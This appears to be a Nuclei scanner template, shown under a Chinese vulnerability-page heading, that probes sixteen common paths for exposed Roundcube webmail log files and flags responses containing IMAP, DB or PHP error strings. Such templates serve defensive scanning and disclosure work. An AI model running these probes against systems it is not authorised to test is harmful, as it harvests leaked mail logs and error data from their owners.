漏洞描述
Roundcube Log file was disclosed.
roundcube-log-disclosure: Roundcube Log Disclosure
PoC代码[已公开]
id: roundcube-log-disclosure
info:
name: Roundcube Log Disclosure
author: dhiyaneshDk,kazet
severity: medium
description: Roundcube Log file was disclosed.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/roundcube-log-disclosure.json
metadata:
max-request: 16
tags: exposure,logs,vuln
http:
- method: GET
path:
- "{{BaseURL}}/{{roundcube_path}}"
payloads:
roundcube_path:
- roundcube/logs/sendmail
- roundcube/logs/sendmail.log
- roundcube/logs/errors.log
- roundcube/logs/errors
- webmail/logs/sendmail
- webmail/logs/sendmail.log
- webmail/logs/errors.log
- webmail/logs/errors
- mail/logs/sendmail
- mail/logs/sendmail.log
- mail/logs/errors.log
- mail/logs/errors
- logs/sendmail
- logs/sendmail.log
- logs/errors.log
- logs/errors
max-size: 1000
matchers-condition: and
matchers:
- type: word
part: body
words:
- "IMAP Error:"
- "Message for"
- "DB Error:"
- "IMAP Error:"
- "PHP Error:"
- "PHP Warning:"
condition: or
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- content_length
# digest: 4b0a00483046022100ced7b9c11197766a7a05825bd8b4dc877004f199c3fb8a9f5d83cf6ab2a4a288022100a8d8af7f21a669fb1297ba6edfc286890b84d0c970eda3cc45283dd537b68794:922c64590222798bb761d5b6d8e72950